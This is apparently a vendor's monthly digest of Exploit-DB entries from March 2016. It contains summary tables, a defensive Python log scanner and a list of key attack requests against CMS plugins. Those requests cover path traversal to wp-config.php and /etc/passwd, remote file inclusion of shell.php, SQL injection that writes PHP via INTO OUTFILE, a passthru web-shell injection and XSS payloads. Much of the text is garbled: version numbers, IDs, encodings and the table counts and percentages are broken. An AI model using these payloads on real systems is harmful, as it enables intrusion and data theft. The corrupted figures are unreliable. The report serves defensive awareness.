EDB Analysis Report (06.03) 06.03.0~06.03.3
A breakdown, by category, of the entries published on Exploit-DB (http://exploit-db.com).

Analysis summary (written by: Penta Security Systems, Security Evaluation Team)

Analysis of the Exploit-DB entries published in March (06.03) shows that Local File Inclusion attacks had the largest number of reports. A Local File Inclusion attack is usually carried out together with a Directory Traversal attack, and it is possible whenever the target file is located on the target server. It is an easy attack: the attacker simply manipulates the path given in a parameter value. Because it exposes system files to the user, its risk is very high relative to its difficulty.

The best way to prevent Local File Inclusion is to fix the source code securely. However, where a site is so large that validating every input value reaching the server is difficult, deploying a web application firewall is the realistic and appropriate measure.

Looking at occurrences by major software, the most reports were for the widely known open-source CMS. The reports analyzed were mostly for newly released plugins rather than for the CMS itself. Administrators running it should apply security patches to the plugins they use so that the server is not left exposed.

1. Reports by type
Type | Reports
Code Injection |
File Upload |
SQL Injection | 4
RFI | 4
XSS | 0
LFI | 3
Total | 33

2. Classification by risk
Risk | Reports | Percentage
 | 6 | 8.8%
 | 7 | 8.8%
Total | 33 | 00.00%

3. Reports by attack difficulty
Difficulty | Reports | Percentage
 | 3 | 9.09%
 | 3 | 9.09%
Low | 7 | 8.8%
Total | 33 | 00.00%

4. Occurrences by major software
Software | Reports
 | 0
PivotX |
itop |
Joomla |
Monstra |
Total | 33

** Details for major software with 5 or more occurrences
EDB No. | Type | Attack difficulty | Attack risk | Name | Software name
3953 | File Upload | Low | | CP Polls Plugin.0.8 - admin.php XSS |
39547 | XSS | Low | | Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS () |
39548 | XSS | Low | | WP Advanced Comment Plugin 0.0 - / XSS |
39547 | XSS | Low | | Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS |
39553 | XSS | Low | | DZS Videogallery Plugin <=8.60 - popup.php XSS |
39553 | XSS | Low | | DZS Videogallery Plugin <=8.60 - ajax.php XSS |
39558 | LFI | Low | | Site Import Plugin.0. - page.php LFI |
39558 | RFI | Low | | Site Import Plugin.0. - page.php RFI |
39584 | LFI | Low | | Image Export Plugin..0 - download.php LFI |
39577 | LFI | Low | | Abtest Plugin - abtest_admin.php LFI |
39575 | LFI | Low | | ebook Download Plugin. - filedownload.php LFI |
39593 | LFI | Low | | Memphis Document Library Plugin 3..5 - / LFI |
39593 | LFI | Low | | Memphis Document Library Plugin 3..5 - /mdocs-posts/ LFI |
3959 | LFI | Low | | Dharma booking Plugin.38.3 - proccess.php LFI |
3959 | RFI | Low | | Dharma booking Plugin.38.3 - proccess.php RFI |
3959 | LFI | Low | | Brandfolder Plugin 3.0 - callback.php LFI |
3959 | RFI | Low | | Brandfolder Plugin 3.0 - callback.php RFI |
39589 | LFI | Low | | HB Audio Gallery Lite Plugin.0.0 - audio-download.php LFI |
3963 | LFI | Low | | Photocart Link Plugin.6 - decode.php LFI |
396 | LFI | Low | | Plugin IMDb Profile Widget.0.8 - pic.php LFI |
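Every LFI and RFI entry in this report arrives as a manipulated path or URL in one request parameter, so a defender can flag the same shapes in web server access logs. The following Python is an added example, not code from the Penta Security report or from any product it lists: it normalizes the encodings seen in the catalogue (percent-encoding, backslash traversal, the `...//` spelling, a trailing `%00`, a base64-wrapped path, a remote URL) and reports which indicators each request contains; the log lines, parameter names and indicator labels are constructed for the example, and the repeated percent-decoding goes one step beyond the report by also catching double-encoded traversal.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TRAVERSAL = re.compile(r"\.\.[\\/]")  # ../ and ..\ ; also hits the ...// spelling used against PivotX
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample log lines (not real traffic); the request shapes mirror the PoCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2016:10:00:00 +0900] "GET /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Mar/2016:10:00:01 +0900] "GET /wp-content/plugins/siteimport/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Mar/2016:10:00:02 +0900] "GET /proccess.php?gateway=../../../../../../etc/passwd%00 HTTP/1.1" 200 1024',
    '10.0.0.5 - - [01/Mar/2016:10:00:03 +0900] "GET /decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== HTTP/1.1" 200 3000',
    '10.0.0.5 - - [01/Mar/2016:10:00:04 +0900] "GET /index.php?page=media&del=...//...//...//important/important.file HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Mar/2016:10:00:05 +0900] "GET /index.php?option=com_x&view=videos HTTP/1.1" 200 8000',
]

def fully_decode(value: str) -> str:
    """Percent-decode until stable so double-encoded traversal is not missed."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def base64_hides_traversal(value: str) -> bool:
    """Photocart-style: the traversal path arrives base64-encoded in the parameter."""
    try:
        decoded = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError: not base64, so not this trick
        return False
    return TRAVERSAL.search(decoded.decode("utf-8", "ignore")) is not None

def classify_target(target: str) -> set:
    """Return the file-inclusion indicators found in one request target's query string."""
    findings = set()
    for _name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already decoded once; this catches %25-wrapped layers
        checks = (("null-byte", "\x00" in value), ("lfi-traversal", TRAVERSAL.search(value)),
                  ("rfi-remote-url", REMOTE_URL.match(value)), ("lfi-base64", base64_hides_traversal(raw)))
        findings.update(name for name, hit in checks if hit)
    return findings

def scan_log(lines) -> dict:
    """Map each suspicious request target to its sorted indicators; clean lines are omitted."""
    targets = (m.group(1) for m in map(REQUEST_TARGET.search, lines) if m)
    return {t: sorted(f) for t in targets for f in [classify_target(t)] if f}
```

Running `scan_log(SAMPLE_LOG)` flags five of the six constructed lines and leaves the plain `view=videos` request alone; the same classifier can be pointed at a WAF or reverse-proxy log to confirm that a patched plugin is no longer being probed.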
Detailed entries
Columns: Date | EDB No. | Category | Attack difficulty | Attack risk | Name | Key attack code | Target program | Target environment

06-03-0 | EDB 3953 | File Upload | Difficulty: Low
Name: CP Polls Plugin.0.8 - admin.php XSS
Target: CP Polls Plugin.0.8
Key attack code:
  POST /wpadmin/admin.php?page=cp_polls&cal=&list=&import= HTTP/.
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
  -----------------------------7dd009908f
  name="importfile"; filename="csv.csv"
  Content-Type: application/octet-stream
  <img src=x onerror=alert('you_are_owned!')
  -----------------------------7dd009908f--

06-03-0 | EDB 39547 | XSS | Difficulty: Low
Name: Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS ()
Target: Best Web Soft Captcha Plugin <= 4..
Key attack code:
  /wpadmin/admin.php?page=captcha.php&action=whitelist&s=%3cscript%3ealert%8%9%3b%3c%Fscript%3E

06-03-0 | EDB 39548 | XSS | Difficulty: Low
Name: WP Advanced Comment Plugin 0.0 - / XSS vulnerability
Target: WP Advanced Comment Plugin 0.0
Key attack code:
  POST / HTTP/.
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
  -----------------------------7dd009908f
  name="comment[meta_value]"
  Hack <script>alert("hacked")</script>
  -----------------------------7dd009908f
  name="comment[meta_key]"
  comment
  -----------------------------7dd009908f--

06-03-0 | EDB 39547 | XSS | Difficulty: Low
Name: Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS
Target: Best Web Soft Captcha Plugin <= 4..
Key attack code:
  POST /wpadmin/admin.php?page=captcha.php&action=whitelist HTTP/.
  s=<script>alert();</script>&search IP=Click here to claim your prize!

06-03- | EDB 39553 | XSS | Difficulty: Low
Name: DZS Videogallery Plugin <=8.60 - popup.php XSS vulnerability
Target: DZS Videogallery Plugin <=8.6
Key attack code:
  /wp-content/plugins/dzsvideogallery/admin/playlistseditor/popup.php?initer=whatava864%7%3balert%8%9%f%f645

06-03- | EDB 39553 | XSS | Difficulty: Low
Name: DZS Videogallery Plugin <=8.60 - ajax.php XSS
Target: DZS Videogallery Plugin <=8.6
Key attack code:
  /wp-content/plugins/dzsvideogallery/ajax.php?height=&source=6d7f"><script>alert()<%fscript>894ba&type=&width=

06-03-4 | EDB 39558 | LFI | Difficulty: Low
Name: Site Import Plugin.0. - page.php LFI
Target: Site Import Plugin.0.
Key attack code:
  /wp-content/plugins/siteimport/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini

06-03-4 | EDB 39558 | RFI | Difficulty: Low
Name: Site Import Plugin.0. - page.php RFI
Target: Site Import Plugin.0.
Key attack code:
  /wp-content/plugins/siteimport/admin/page.php?url=http%3a%f%flocalhost%fshell.php?shell=ls

06-03-4 | EDB 39559 | SQL Injection
Name: ..4 - item.query.php SQL Injection
Key attack code:
  POST /source/item.query.php HTTP/...
  type=action_on_quick_icon&id=(select (CASE WHEN (644=644) THEN 644 ELSE 644*(SELECT 644 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=

06-03-4 | EDB 39559 | SQL Injection
Name: ..4 - view.query.php SQL Injection
Key attack code:
  POST /source/view.query.php HTTP/...
  type=connections_logs&order=(select (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC

06-03-6 | EDB 39567 | XSS | Difficulty: Low
Name: Monstra CMS 3.0.3 - /monstra-3.0.3/users/8/edit XSS
Target: Monstra / Monstra CMS 3.0.
Key attack code:
  POST /monstra-3.0.3/users/8/edit HTTP/.
  csrf=685bba70d44b8b877937b56f5b87e66935fe&user_id=8&login=user&firstname=%%3E%3Cscript%3Ealert%8%9%3B%3C%Fscript%3e&lastname=%%3e%3cscript%3ealert%8%9%3B%3C%Fscript%3E&email=%%3E%3Cscript%3Ealert%8%9%3B%3C%Fscript%3e&twitter=%%3e%3cscript%3ealert%8%9%3B%3C%Fscript%3E&skype=%%3E%3Cscript%3Ealert%8%9%3B%3C%Fscript%3e&about_me=%%3e%3cscript%3ealert%8%9%3b%3c%fscript%3e&new_password=&edit_profile=save

06-03-7 | EDB 3957 | RFI | Difficulty: Low
Name: .4. - admin-logs.php RFI
Target: .4.
Key attack code:
  /zp-core/adminlogs.php?action=download_log&page=logs&tab=http://localhost/shell.php%3f%78%3d%69%64%6%66%6f%6f%3d&filename=security&XSRFToken=afd5bafed79d837486fdbeea8f87bc9dea

06-03-7 | EDB 3957 | LFI
Name: PivotX.3. - index.php LFI
Target: PivotX / PivotX.3.
Key attack code:
  /pivotx_latest/pivotx/index.php?page=media&del=...//...//...//...//...//...//...//...//...//...//...//...//important/important.file&pivotxsession=ovyyn4objc5ym9

06-03-7 | EDB 3957 | LFI
Name: PivotX.3. - ajaxhelper.php LFI
Target: PivotX / PivotX.3.
Key attack code:
  /pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=l3zhci93d3cvcglb3r4xxhdgvzdc9CYXNlZGlyLwo=&file=../...//...//...//...//...//...//....//...//...//...//...//...//etc/passwd

06-03- | EDB 39588 | XSS | Difficulty: Low
Name: r58 - index.php XSS
Target: r58
Key attack code:
  POST /my_files/index.php HTTP/.
  search=%%3e%3cscript%3ealert%8%7xsS%7%9%3B%3C%Fscript%3E

06-03- | EDB 39588 | XSS | Difficulty: Low
Name: r58 - clients.php XSS
Target: r58
Key attack code:
  POST /clients.php HTTP/.
  search=%%3e%3cscript%3ealert%8%7xsS%7%9%3C%Fscript%3E

06-03- | EDB 39587 | Code Injection
Name: itop.. - config.php Code Injection
Target: itop / itop..
Key attack code:
  POST /env-production/itopconfig/config.php?c%5bmenu%5d=configeditor HTTP/.
  operation=save&prev_config=&new_config=<? if(isset($_get['cmd'])) die(passthru($_get['cmd']));?>

06-03- | EDB 39584 | LFI | Difficulty: Low
Name: Image Export Plugin..0 - download.php LFI
Target: Image Export Plugin..0
Key attack code:
  /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php

06-03- | EDB 39577 | LFI | Difficulty: Low
Name: Abtest Plugin - abtest_admin.php LFI
Target: Abtest Plugin
Key attack code:
  /wpcontent/plugins/abtest/abtest_admin.php?action=../../etc/passwd

06-03- | EDB 39575 | LFI | Difficulty: Low
Name: ebook Download Plugin. - filedownload.php LFI
Target: ebook Download Plugin.
Key attack code:
  /wp-content/plugins/ebookdownload/filedownload.php?ebookdownloadurl=../../../wp-config.php

06-03- | EDB 39593 | LFI | Difficulty: Low
Name: Memphis Document Library Plugin 3..5 - / LFI
Target: Memphis Document Library Plugin 3..5
Key attack code:
  /?mdocs-img-preview=../../../wp-config.php

06-03- | EDB 39593 | LFI | Difficulty: Low
Name: Memphis Document Library Plugin 3..5 - /mdocsposts/ LFI
Target: Memphis Document Library Plugin 3..5
Key attack code:
  /mdocs-posts/?mdocs-img-preview=../../../wpconfig.php

06-03- | EDB 3959 | LFI | Difficulty: Low
Name: Dharma booking Plugin.38.3 - proccess.php LFI
Target: Dharma booking Plugin.38.3
Key attack code:
  /wp/dharmabooking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00

06-03- | EDB 3959 | RFI | Difficulty: Low
Name: Dharma booking Plugin.38.3 - proccess.php RFI
Target: Dharma booking Plugin.38.3
Key attack code:
  /wp/dharmabooking/frontend/ajax/gateways/proccess.php?gateway=http://www.example.com/index.php

06-03- | EDB 3959 | LFI | Difficulty: Low
Name: Brandfolder Plugin 3.0 - callback.php LFI
Target: Brandfolder Plugin 3.0
Key attack code:
  /wp/wpcontent/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00

06-03- | EDB 3959 | RFI | Difficulty: Low
Name: Brandfolder Plugin 3.0 - callback.php RFI
Target: Brandfolder Plugin 3.0
Key attack code:
  /wp/wpcontent/plugins/brandfolder/callback.php?wp_abspath=http://www.example.com/index.php

06-03- | EDB 39590 | SQL Injection | Difficulty: Low
Name: Joomla Easy Youtube Gallery.0. - index.php SQL Injection vulnerability
Target: Joomla / Joomla Easy Youtube Gallery.0.
Key attack code:
  /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%7%0or%0%7%7=%7%7&defaultvideo=9&Itemid=75

06-03- | EDB 39589 | LFI | Difficulty: Low
Name: HB Audio Gallery Lite Plugin.0.0 - audiodownload.php LFI
Target: HB Audio Gallery Lite Plugin.0.0
Key attack code:
  /wp-content/plugins/hb-audio-gallerylite/gallery/audiodownload.php?file_path=../../../../wpconfig.php&file_size=0

06-03-7 | EDB 3963 | LFI | Difficulty: Low
Name: Photocart Link Plugin.6 - decode.php LFI
Target: Photocart Link Plugin.6
Key attack code:
  /wp-content/plugins/photocartlink/decode.php?id=li4vli4vli4vd3aty9uzmlnlnBocA==

06-03-7 | EDB 396 | LFI | Difficulty: Low
Name: Plugin IMDb Profile Widget.0.8 - pic.php LFI
Target: Plugin IMDb Profile Widget.0.8
Key attack code:
  /wp-content/plugins/imdbwidget/pic.php?url=../../../wp-config.php

06-03-8 | EDB 3966 | XSS | Difficulty: Low
Name: 5.. - /user/test/home XSS
Target: 5..
Key attack code:
  POST /user/test/home?p_p_id=79&p_p_lifecycle=&p_p_state=maximized&p_p_mode=view&_79_struts_action=%fenterprise_admin%fedit_user HTTP/.
  _79_jobTitle="><script>alert();</script>

06-03-30 | EDB 39637 | SQL Injection
Name: 6.0.0 - admin.php SQL Injection
Target: 6.0.0
Key attack code:
  /admin.php?_g=products&cat_id=&sort[updated]=DESC&char=T]%7%0UNION%0SELECT%0,,3,4,5,6,7,8,9,'<? phpinfo();?>',,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8%0INTO%0OUTFILE%0'/var/www/site/file.php'%0--%0

06-03-30 | EDB 39637 | XSS | Difficulty: Low
Name: 6.0.0 - index.php XSS
Target: 6.0.0
Key attack code:
  POST /index.php?_a=profile HTTP/.
  first_name=" onmouseover="javascript:alert(/immuniweb/);"